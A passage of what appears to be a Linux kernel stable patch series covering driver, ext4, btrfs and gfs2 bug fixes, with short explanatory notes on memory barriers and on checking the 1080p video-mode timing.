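The two virtio_mb(false) calls added above act as publish barriers: all vq/vring setup stores must be visible to other CPUs before vq->priv is consulted or the 'is_ready' flag is observed as true. A minimal user-space analogue of the same publication pattern, sketched with C11 acquire/release atomics (illustrative only; the type and function names here are invented, and virtio_mb() is a stronger full barrier):

#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

struct fifo {
	void *vq_priv;		/* plain data set up before publication */
	atomic_bool is_ready;	/* publication flag */
};

static void publish(struct fifo *f, void *priv)
{
	f->vq_priv = priv;	/* setup store... */
	atomic_store_explicit(&f->is_ready, true,
			      memory_order_release); /* ...ordered before the flag */
}

static void *consume(struct fifo *f)
{
	if (!atomic_load_explicit(&f->is_ready, memory_order_acquire))
		return NULL;	/* acquire pairs with the release above */
	return f->vq_priv;	/* setup store is now guaranteed visible */
}
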
+diff --git a/drivers/platform/x86/intel_scu_pcidrv.c b/drivers/platform/x86/intel_scu_pcidrv.c
+index 80abc708e4f2f..d904fad499aa5 100644
+--- a/drivers/platform/x86/intel_scu_pcidrv.c
++++ b/drivers/platform/x86/intel_scu_pcidrv.c
+@@ -34,6 +34,7 @@ static int intel_scu_pci_probe(struct pci_dev *pdev,
+ 
+ static const struct pci_device_id pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x080e) },
++	{ PCI_VDEVICE(INTEL, 0x082a) },
+ 	{ PCI_VDEVICE(INTEL, 0x08ea) },
+ 	{ PCI_VDEVICE(INTEL, 0x0a94) },
+ 	{ PCI_VDEVICE(INTEL, 0x11a0) },
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index 5a05d1cdfec20..a8def50c149bd 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -1293,6 +1293,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 			return PTR_ERR(kkey);
+ 		rc = pkey_keyblob2pkey(kkey, ktp.keylen, &ktp.protkey);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey()=%d\n", __func__, rc);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc)
+ 			break;
+@@ -1426,6 +1427,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 					kkey, ktp.keylen, &ktp.protkey);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey2()=%d\n", __func__, rc);
+ 		kfree(apqns);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc)
+ 			break;
+@@ -1552,6 +1554,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 					protkey, &protkeylen);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey3()=%d\n", __func__, rc);
+ 		kfree(apqns);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc) {
+ 			kfree(protkey);
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 8b89fab7c4206..fb6e9a7a7f58b 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -1491,6 +1491,7 @@ static int scsi_dispatch_cmd(struct scsi_cmnd *cmd)
+ 		 */
+ 		SCSI_LOG_MLQUEUE(3, scmd_printk(KERN_INFO, cmd,
+ 			"queuecommand : device blocked\n"));
++		atomic_dec(&cmd->device->iorequest_cnt);
+ 		return SCSI_MLQUEUE_DEVICE_BUSY;
+ 	}
+ 
+@@ -1523,6 +1524,7 @@ static int scsi_dispatch_cmd(struct scsi_cmnd *cmd)
+ 	trace_scsi_dispatch_cmd_start(cmd);
+ 	rtn = host->hostt->queuecommand(host, cmd);
+ 	if (rtn) {
++		atomic_dec(&cmd->device->iorequest_cnt);
+ 		trace_scsi_dispatch_cmd_error(cmd, rtn);
+ 		if (rtn != SCSI_MLQUEUE_DEVICE_BUSY &&
+ 		    rtn != SCSI_MLQUEUE_TARGET_BUSY)
+diff --git a/drivers/scsi/stex.c b/drivers/scsi/stex.c
+index 8def242675ef3..6b07f367918ef 100644
+--- a/drivers/scsi/stex.c
++++ b/drivers/scsi/stex.c
+@@ -109,7 +109,9 @@ enum {
+ 	TASK_ATTRIBUTE_HEADOFQUEUE		= 0x1,
+ 	TASK_ATTRIBUTE_ORDERED			= 0x2,
+ 	TASK_ATTRIBUTE_ACA			= 0x4,
++};
+ 
++enum {
+ 	SS_STS_NORMAL				= 0x80000000,
+ 	SS_STS_DONE				= 0x40000000,
+ 	SS_STS_HANDSHAKE			= 0x20000000,
+@@ -121,7 +123,9 @@ enum {
+ 	SS_I2H_REQUEST_RESET			= 0x2000,
+ 
+ 	SS_MU_OPERATIONAL			= 0x80000000,
++};
+ 
++enum {
+ 	STEX_CDB_LENGTH				= 16,
+ 	STATUS_VAR_LEN				= 128,
+ 
+diff --git a/drivers/tty/serial/8250/8250_tegra.c b/drivers/tty/serial/8250/8250_tegra.c
+index e7cddeec9d8e0..c424e2ae0e8fe 100644
+--- a/drivers/tty/serial/8250/8250_tegra.c
++++ b/drivers/tty/serial/8250/8250_tegra.c
+@@ -112,13 +112,15 @@ static int tegra_uart_probe(struct platform_device *pdev)
+ 
+ 	ret = serial8250_register_8250_port(&port8250);
+ 	if (ret < 0)
+-		goto err_clkdisable;
++		goto err_ctrl_assert;
+ 
+ 	platform_set_drvdata(pdev, uart);
+ 	uart->line = ret;
+ 
+ 	return 0;
+ 
++err_ctrl_assert:
++	reset_control_assert(uart->rst);
+ err_clkdisable:
+ 	clk_disable_unprepare(uart->clk);
+ 
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index 4fce15296f311..12f685168aef9 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -769,7 +769,7 @@ config SERIAL_PMACZILOG_CONSOLE
+ 
+ config SERIAL_CPM
+ 	tristate "CPM SCC/SMC serial port support"
+-	depends on CPM2 || CPM1 || (PPC32 && COMPILE_TEST)
++	depends on CPM2 || CPM1
+ 	select SERIAL_CORE
+ 	help
+ 	  This driver supports the SCC and SMC serial ports on Motorola 
+diff --git a/drivers/tty/serial/cpm_uart/cpm_uart.h b/drivers/tty/serial/cpm_uart/cpm_uart.h
+index 0577618e78c04..46c03ed71c31b 100644
+--- a/drivers/tty/serial/cpm_uart/cpm_uart.h
++++ b/drivers/tty/serial/cpm_uart/cpm_uart.h
+@@ -19,8 +19,6 @@ struct gpio_desc;
+ #include "cpm_uart_cpm2.h"
+ #elif defined(CONFIG_CPM1)
+ #include "cpm_uart_cpm1.h"
+-#elif defined(CONFIG_COMPILE_TEST)
+-#include "cpm_uart_cpm2.h"
+ #endif
+ 
+ #define SERIAL_CPM_MAJOR	204
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 81467e93c7d53..dc7ac1ddbca5e 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1475,34 +1475,36 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp, modem;
+-	struct tty_struct *tty;
+-	unsigned int cflag = 0;
+-
+-	tty = tty_port_tty_get(&port->state->port);
+-	if (tty) {
+-		cflag = tty->termios.c_cflag;
+-		tty_kref_put(tty);
+-	}
++	unsigned long temp;
+ 
+-	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
+-	modem = lpuart32_read(port, UARTMODIR);
++	temp = lpuart32_read(port, UARTCTRL);
+ 
++	/*
++	 * The LPUART IP has two known bugs. One is that CTS has higher priority
++	 * than the break signal, so a break sent through UARTCTRL_SBK may be
++	 * impacted by the CTS input if HW flow control is enabled. This exists
++	 * on all platforms we support in this driver.
++	 * The other is that the i.MX8QM LPUART may send an additional break
++	 * character after SBK is cleared.
++	 * To avoid both bugs, we use the Transmit Data Inversion function to
++	 * send the break signal instead of UARTCTRL_SBK.
++	 */
+ 	if (break_state != 0) {
+-		temp |= UARTCTRL_SBK;
+ 		/*
+-		 * LPUART CTS has higher priority than SBK, need to disable CTS before
+-		 * asserting SBK to avoid any interference if flow control is enabled.
++		 * Disable the transmitter to prevent any data from being sent out
++		 * during break, then invert the TX line to send break.
+ 		 */
+-		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
+-			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++		temp &= ~UARTCTRL_TE;
++		lpuart32_write(port, temp, UARTCTRL);
++		temp |= UARTCTRL_TXINV;
++		lpuart32_write(port, temp, UARTCTRL);
+ 	} else {
+-		/* Re-enable the CTS when break off. */
+-		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
+-			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++		/* Disable the TXINV to turn off break and re-enable transmitter. */
++		temp &= ~UARTCTRL_TXINV;
++		lpuart32_write(port, temp, UARTCTRL);
++		temp |= UARTCTRL_TE;
++		lpuart32_write(port, temp, UARTCTRL);
+ 	}
+-
+-	lpuart32_write(port, temp, UARTCTRL);
+ }
+ 
+ static void lpuart_setup_watermark(struct lpuart_port *sport)
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index ccfaebca6faa7..1dcadef933e3a 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -2097,6 +2097,19 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	else
+ 		priv_ep->trb_burst_size = 16;
+ 
++	/*
++	 * In versions preceding DEV_VER_V2 (for example, i.MX8QM), bugs exist
++	 * in the DMA. They occur when the trb_burst_size exceeds 16 and the
++	 * address is not aligned to 128 bytes (the product of the 64-bit AXI
++	 * width and the AXI maximum burst length of 16, i.e. 0xF+1 in
++	 * dma_axi_ctrl0[3:0]). This results in data corruption when a transfer
++	 * crosses the 4K border; the corruption occurs from position
++	 * (4K - (address & 0x7F)) to 4K.
++	 * So force trb_burst_size to 16 on such platforms.
++	 */
++	if (priv_dev->dev_ver < DEV_VER_V2)
++		priv_ep->trb_burst_size = 16;
++
+ 	mult = min_t(u8, mult, EP_CFG_MULT_MAX);
+ 	buffering = min_t(u8, buffering, EP_CFG_BUFFERING_MAX);
+ 	maxburst = min_t(u8, maxburst, EP_CFG_MAXBURST_MAX);
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 8ad354741380d..3e59055aa5040 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -3620,6 +3620,7 @@ static void ffs_func_unbind(struct usb_configuration *c,
+ 	/* Drain any pending AIO completions */
+ 	drain_workqueue(ffs->io_completion_wq);
+ 
++	ffs_event_add(ffs, FUNCTIONFS_UNBIND);
+ 	if (!--opts->refcnt)
+ 		functionfs_unbind(ffs);
+ 
+@@ -3644,7 +3645,6 @@ static void ffs_func_unbind(struct usb_configuration *c,
+ 	func->function.ssp_descriptors = NULL;
+ 	func->interfaces_nums = NULL;
+ 
+-	ffs_event_add(ffs, FUNCTIONFS_UNBIND);
+ }
+ 
+ static struct usb_function *ffs_alloc(struct usb_function_instance *fi)
+diff --git a/drivers/video/fbdev/core/bitblit.c b/drivers/video/fbdev/core/bitblit.c
+index f98e8f298bc19..8587c9da06700 100644
+--- a/drivers/video/fbdev/core/bitblit.c
++++ b/drivers/video/fbdev/core/bitblit.c
+@@ -247,6 +247,9 @@ static void bit_cursor(struct vc_data *vc, struct fb_info *info, int mode,
+ 
+ 	cursor.set = 0;
+ 
++	if (!vc->vc_font.data)
++		return;
++
+  	c = scr_readw((u16 *) vc->vc_pos);
+ 	attribute = get_attribute(info, c);
+ 	src = vc->vc_font.data + ((c & charmask) * (w * vc->vc_font.height));
+diff --git a/drivers/video/fbdev/core/modedb.c b/drivers/video/fbdev/core/modedb.c
+index 6473e0dfe1464..e78ec7f728463 100644
+--- a/drivers/video/fbdev/core/modedb.c
++++ b/drivers/video/fbdev/core/modedb.c
+@@ -257,6 +257,11 @@ static const struct fb_videomode modedb[] = {
+ 	{ NULL, 72, 480, 300, 33386, 40, 24, 11, 19, 80, 3, 0,
+ 		FB_VMODE_DOUBLE },
+ 
++	/* 1920x1080 @ 60 Hz, 67.3 kHz hsync */
++	{ NULL, 60, 1920, 1080, 6734, 148, 88, 36, 4, 44, 5, 0,
++		FB_SYNC_HOR_HIGH_ACT | FB_SYNC_VERT_HIGH_ACT,
++		FB_VMODE_NONINTERLACED },
++
+ 	/* 1920x1200 @ 60 Hz, 74.5 Khz hsync */
+ 	{ NULL, 60, 1920, 1200, 5177, 128, 336, 1, 38, 208, 3,
+ 		FB_SYNC_HOR_HIGH_ACT | FB_SYNC_VERT_HIGH_ACT,
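
The new 1080p entry can be sanity-checked from the fb_videomode fields themselves (pixclock is a period in picoseconds; margins and sync lengths are in pixels/lines). A small stand-alone check, assuming the usual field order { name, refresh, xres, yres, pixclock, left, right, upper, lower, hsync_len, vsync_len, ... }:

#include <stdio.h>

int main(void)
{
	unsigned int htotal = 1920 + 148 + 88 + 44; /* xres + left + right + hsync_len = 2200 */
	unsigned int vtotal = 1080 + 36 + 4 + 5;    /* yres + upper + lower + vsync_len = 1125 */
	double pixclk_hz = 1e12 / 6734;             /* 6734 ps period -> ~148.5 MHz */

	printf("hsync %.1f kHz, vrefresh %.1f Hz\n",
	       pixclk_hz / htotal / 1e3,            /* ~67.5 kHz */
	       pixclk_hz / htotal / vtotal);        /* ~60.0 Hz */
	return 0;
}

This matches the standard CEA-861 1080p60 timing; note the computed line rate is closer to 67.5 kHz than the 67.3 kHz quoted in the comment.
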
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index d7edb9c5d3a3f..e6adb2890ecfe 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1347,7 +1347,7 @@ static const struct fb_ops imsttfb_ops = {
+ 	.fb_ioctl 	= imsttfb_ioctl,
+ };
+ 
+-static void init_imstt(struct fb_info *info)
++static int init_imstt(struct fb_info *info)
+ {
+ 	struct imstt_par *par = info->par;
+ 	__u32 i, tmp, *ip, *end;
+@@ -1420,7 +1420,7 @@ static void init_imstt(struct fb_info *info)
+ 	    || !(compute_imstt_regvals(par, info->var.xres, info->var.yres))) {
+ 		printk("imsttfb: %ux%ux%u not supported\n", info->var.xres, info->var.yres, info->var.bits_per_pixel);
+ 		framebuffer_release(info);
+-		return;
++		return -ENODEV;
+ 	}
+ 
+ 	sprintf(info->fix.id, "IMS TT (%s)", par->ramdac == IBM ? "IBM" : "TVP");
+@@ -1456,12 +1456,13 @@ static void init_imstt(struct fb_info *info)
+ 
+ 	if (register_framebuffer(info) < 0) {
+ 		framebuffer_release(info);
+-		return;
++		return -ENODEV;
+ 	}
+ 
+ 	tmp = (read_reg_le32(par->dc_regs, SSTATUS) & 0x0f00) >> 8;
+ 	fb_info(info, "%s frame buffer; %uMB vram; chip version %u\n",
+ 		info->fix.id, info->fix.smem_len >> 20, tmp);
++	return 0;
+ }
+ 
+ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+@@ -1529,10 +1530,10 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (!par->cmap_regs)
+ 		goto error;
+ 	info->pseudo_palette = par->palette;
+-	init_imstt(info);
+-
+-	pci_set_drvdata(pdev, info);
+-	return 0;
++	ret = init_imstt(info);
++	if (!ret)
++		pci_set_drvdata(pdev, info);
++	return ret;
+ 
+ error:
+ 	if (par->dc_regs)
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index ef8a4c5fc6875..63f51783352dc 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -1413,6 +1413,7 @@ out_err1:
+ 	iounmap(info->screen_base);
+ out_err0:
+ 	kfree(fb);
++	sti->info = NULL;
+ 	return -ENXIO;
+ }
+ 
+diff --git a/drivers/watchdog/menz69_wdt.c b/drivers/watchdog/menz69_wdt.c
+index 8973f98bc6a56..bca0938f3429f 100644
+--- a/drivers/watchdog/menz69_wdt.c
++++ b/drivers/watchdog/menz69_wdt.c
+@@ -98,14 +98,6 @@ static const struct watchdog_ops men_z069_ops = {
+ 	.set_timeout = men_z069_wdt_set_timeout,
+ };
+ 
+-static struct watchdog_device men_z069_wdt = {
+-	.info = &men_z069_info,
+-	.ops = &men_z069_ops,
+-	.timeout = MEN_Z069_DEFAULT_TIMEOUT,
+-	.min_timeout = 1,
+-	.max_timeout = MEN_Z069_WDT_COUNTER_MAX / MEN_Z069_TIMER_FREQ,
+-};
+-
+ static int men_z069_probe(struct mcb_device *dev,
+ 			  const struct mcb_device_id *id)
+ {
+@@ -125,15 +117,19 @@ static int men_z069_probe(struct mcb_device *dev,
+ 		goto release_mem;
+ 
+ 	drv->mem = mem;
++	drv->wdt.info = &men_z069_info;
++	drv->wdt.ops = &men_z069_ops;
++	drv->wdt.timeout = MEN_Z069_DEFAULT_TIMEOUT;
++	drv->wdt.min_timeout = 1;
++	drv->wdt.max_timeout = MEN_Z069_WDT_COUNTER_MAX / MEN_Z069_TIMER_FREQ;
+ 
+-	drv->wdt = men_z069_wdt;
+ 	watchdog_init_timeout(&drv->wdt, 0, &dev->dev);
+ 	watchdog_set_nowayout(&drv->wdt, nowayout);
+ 	watchdog_set_drvdata(&drv->wdt, drv);
+ 	drv->wdt.parent = &dev->dev;
+ 	mcb_set_drvdata(dev, drv);
+ 
+-	return watchdog_register_device(&men_z069_wdt);
++	return watchdog_register_device(&drv->wdt);
+ 
+ release_mem:
+ 	mcb_release_mem(mem);
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index dbbae92ac23d8..ab9f8d6c4f1b9 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -3118,6 +3118,7 @@ static int push_leaf_right(struct btrfs_trans_handle *trans, struct btrfs_root
+ 
+ 	if (check_sibling_keys(left, right)) {
+ 		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
+ 		btrfs_tree_unlock(right);
+ 		free_extent_buffer(right);
+ 		return ret;
+@@ -3348,6 +3349,7 @@ static int push_leaf_left(struct btrfs_trans_handle *trans, struct btrfs_root
+ 
+ 	if (check_sibling_keys(left, right)) {
+ 		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
+ 		goto out;
+ 	}
+ 	return __push_leaf_left(path, min_data_size,
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 21d8a895e9adb..ca69a46f10065 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -104,7 +104,7 @@ static void csum_tree_block(struct extent_buffer *buf, u8 *result)
+ 	crypto_shash_update(shash, kaddr + BTRFS_CSUM_SIZE,
+ 			    first_page_part - BTRFS_CSUM_SIZE);
+ 
+-	for (i = 1; i < num_pages; i++) {
++	for (i = 1; i < num_pages && INLINE_EXTENT_BUFFER_PAGES > 1; i++) {
+ 		kaddr = page_address(buf->pages[i]);
+ 		crypto_shash_update(shash, kaddr, PAGE_SIZE);
+ 	}
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 54e3c2ab21d22..1989c8deea55a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3938,7 +3938,7 @@ static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ 	struct dentry *dentry;
+ 	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err = 0;
++	int pathlen = 0, err;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+@@ -3961,6 +3961,7 @@ static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ 	cap = __get_cap_for_mds(ci, mds);
+ 	if (!cap) {
+ 		spin_unlock(&ci->i_ceph_lock);
++		err = 0;
+ 		goto out_err;
+ 	}
+ 	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 2156d2a1a7700..0ea3960cb83ee 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1007,11 +1007,13 @@ do {									       \
+  *			  where the second inode has larger inode number
+  *			  than the first
+  *  I_DATA_SEM_QUOTA  - Used for quota inodes only
++ *  I_DATA_SEM_EA     - Used for ea_inodes only
+  */
+ enum {
+ 	I_DATA_SEM_NORMAL = 0,
+ 	I_DATA_SEM_OTHER,
+ 	I_DATA_SEM_QUOTA,
++	I_DATA_SEM_EA
+ };
+ 
+ 
+@@ -2968,7 +2970,8 @@ typedef enum {
+ 	EXT4_IGET_NORMAL =	0,
+ 	EXT4_IGET_SPECIAL =	0x0001, /* OK to iget a system inode */
+ 	EXT4_IGET_HANDLE = 	0x0002,	/* Inode # is from a handle */
+-	EXT4_IGET_BAD =		0x0004  /* Allow to iget a bad inode */
++	EXT4_IGET_BAD =		0x0004, /* Allow to iget a bad inode */
++	EXT4_IGET_EA_INODE =	0x0008	/* Inode should contain an EA value */
+ } ext4_iget_flags;
+ 
+ extern struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index ffc810436ef21..80d5a859ab148 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4763,6 +4763,24 @@ static inline void ext4_inode_set_iversion_queried(struct inode *inode, u64 val)
+ 		inode_set_iversion_queried(inode, val);
+ }
+ 
++static const char *check_igot_inode(struct inode *inode, ext4_iget_flags flags)
++{
++	if (flags & EXT4_IGET_EA_INODE) {
++		if (!(EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL))
++			return "missing EA_INODE flag";
++		if (ext4_test_inode_state(inode, EXT4_STATE_XATTR) ||
++		    EXT4_I(inode)->i_file_acl)
++			return "ea_inode with extended attributes";
++	} else {
++		if ((EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL))
++			return "unexpected EA_INODE flag";
++	}
++	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD))
++		return "unexpected bad inode w/o EXT4_IGET_BAD";
++	return NULL;
++}
++
+ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 			  ext4_iget_flags flags, const char *function,
+ 			  unsigned int line)
+@@ -4772,6 +4790,7 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	struct ext4_inode_info *ei;
+ 	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
+ 	struct inode *inode;
++	const char *err_str;
+ 	journal_t *journal = EXT4_SB(sb)->s_journal;
+ 	long ret;
+ 	loff_t size;
+@@ -4799,8 +4818,14 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	inode = iget_locked(sb, ino);
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if ((err_str = check_igot_inode(inode, flags)) != NULL) {
++			ext4_error_inode(inode, function, line, 0, err_str);
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	ei = EXT4_I(inode);
+ 	iloc.bh = NULL;
+@@ -5066,10 +5091,9 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
+-	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD)) {
+-		ext4_error_inode(inode, function, line, 0,
+-				 "bad inode without EXT4_IGET_BAD flag");
+-		ret = -EUCLEAN;
++	if ((err_str = check_igot_inode(inode, flags)) != NULL) {
++		ext4_error_inode(inode, function, line, 0, err_str);
++		ret = -EFSCORRUPTED;
+ 		goto bad_inode;
+ 	}
+ 
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index bd2e803d653f7..5db1060b8684f 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6541,18 +6541,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 		}
+ 	}
+ 
+-	/*
+-	 * Reinitialize lazy itable initialization thread based on
+-	 * current settings
+-	 */
+-	if (sb_rdonly(sb) || !test_opt(sb, INIT_INODE_TABLE))
+-		ext4_unregister_li_request(sb);
+-	else {
+-		ext4_group_t first_not_zeroed;
+-		first_not_zeroed = ext4_has_uninit_itable(sb);
+-		ext4_register_li_request(sb, first_not_zeroed);
+-	}
+-
+ 	/*
+ 	 * Handle creation of system zone data early because it can fail.
+ 	 * Releasing of existing data is done when we are sure remount will
+@@ -6590,6 +6578,18 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (enable_rw)
+ 		sb->s_flags &= ~SB_RDONLY;
+ 
++	/*
++	 * Reinitialize lazy itable initialization thread based on
++	 * current settings
++	 */
++	if (sb_rdonly(sb) || !test_opt(sb, INIT_INODE_TABLE))
++		ext4_unregister_li_request(sb);
++	else {
++		ext4_group_t first_not_zeroed;
++		first_not_zeroed = ext4_has_uninit_itable(sb);
++		ext4_register_li_request(sb, first_not_zeroed);
++	}
++
+ 	if (!ext4_has_feature_mmp(sb) || sb_rdonly(sb))
+ 		ext4_stop_mmpd(sbi);
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index b1b8fe86ccdbd..fddde5045d0c8 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -123,7 +123,11 @@ ext4_expand_inode_array(struct ext4_xattr_inode_array **ea_inode_array,
+ #ifdef CONFIG_LOCKDEP
+ void ext4_xattr_inode_set_class(struct inode *ea_inode)
+ {
++	struct ext4_inode_info *ei = EXT4_I(ea_inode);
++
+ 	lockdep_set_subclass(&ea_inode->i_rwsem, 1);
++	(void) ei;	/* shut up clang warning if !CONFIG_LOCKDEP */
++	lockdep_set_subclass(&ei->i_data_sem, I_DATA_SEM_EA);
+ }
+ #endif
+ 
+@@ -397,7 +401,7 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 		return -EFSCORRUPTED;
+ 	}
+ 
+-	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
++	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_EA_INODE);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+ 		ext4_error(parent->i_sb,
+@@ -405,23 +409,6 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 			   err);
+ 		return err;
+ 	}
+-
+-	if (is_bad_inode(inode)) {
+-		ext4_error(parent->i_sb,
+-			   "error while reading EA inode %lu is_bad_inode",
+-			   ea_ino);
+-		err = -EIO;
+-		goto error;
+-	}
+-
+-	if (!(EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL)) {
+-		ext4_error(parent->i_sb,
+-			   "EA inode %lu does not have EXT4_EA_INODE_FL flag",
+-			    ea_ino);
+-		err = -EINVAL;
+-		goto error;
+-	}
+-
+ 	ext4_xattr_inode_set_class(inode);
+ 
+ 	/*
+@@ -442,9 +429,6 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 
+ 	*ea_inode = inode;
+ 	return 0;
+-error:
+-	iput(inode);
+-	return err;
+ }
+ 
+ /* Remove entry from mbcache when EA inode is getting evicted */
+@@ -1507,11 +1491,11 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ 
+ 	while (ce) {
+ 		ea_inode = ext4_iget(inode->i_sb, ce->e_value,
+-				     EXT4_IGET_NORMAL);
+-		if (!IS_ERR(ea_inode) &&
+-		    !is_bad_inode(ea_inode) &&
+-		    (EXT4_I(ea_inode)->i_flags & EXT4_EA_INODE_FL) &&
+-		    i_size_read(ea_inode) == value_len &&
++				     EXT4_IGET_EA_INODE);
++		if (IS_ERR(ea_inode))
++			goto next_entry;
++		ext4_xattr_inode_set_class(ea_inode);
++		if (i_size_read(ea_inode) == value_len &&
+ 		    !ext4_xattr_inode_read(ea_inode, ea_data, value_len) &&
+ 		    !ext4_xattr_inode_verify_hashes(ea_inode, NULL, ea_data,
+ 						    value_len) &&
+@@ -1521,9 +1505,8 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ 			kvfree(ea_data);
+ 			return ea_inode;
+ 		}
+-
+-		if (!IS_ERR(ea_inode))
+-			iput(ea_inode);
++		iput(ea_inode);
++	next_entry:
+ 		ce = mb_cache_entry_find_next(ea_inode_cache, ce);
+ 	}
+ 	kvfree(ea_data);
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 2015bd05cba10..9d27aa8bd2bc6 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -1380,6 +1380,14 @@ static void gfs2_evict_inode(struct inode *inode)
+ 	if (inode->i_nlink || sb_rdonly(sb))
+ 		goto out;
+ 
++	/*
++	 * In case of an incomplete mount, gfs2_evict_inode() may be called for
++	 * system files without having an active journal to write to.  In that
++	 * case, skip the filesystem evict.
++	 */
++	if (!sdp->sd_jdesc)
++		goto out;
++
+ 	gfs2_holder_mark_uninitialized(&gh);
+ 	ret = evict_should_delete(inode, &gh);
+ 	if (ret == SHOULD_DEFER_EVICTION)
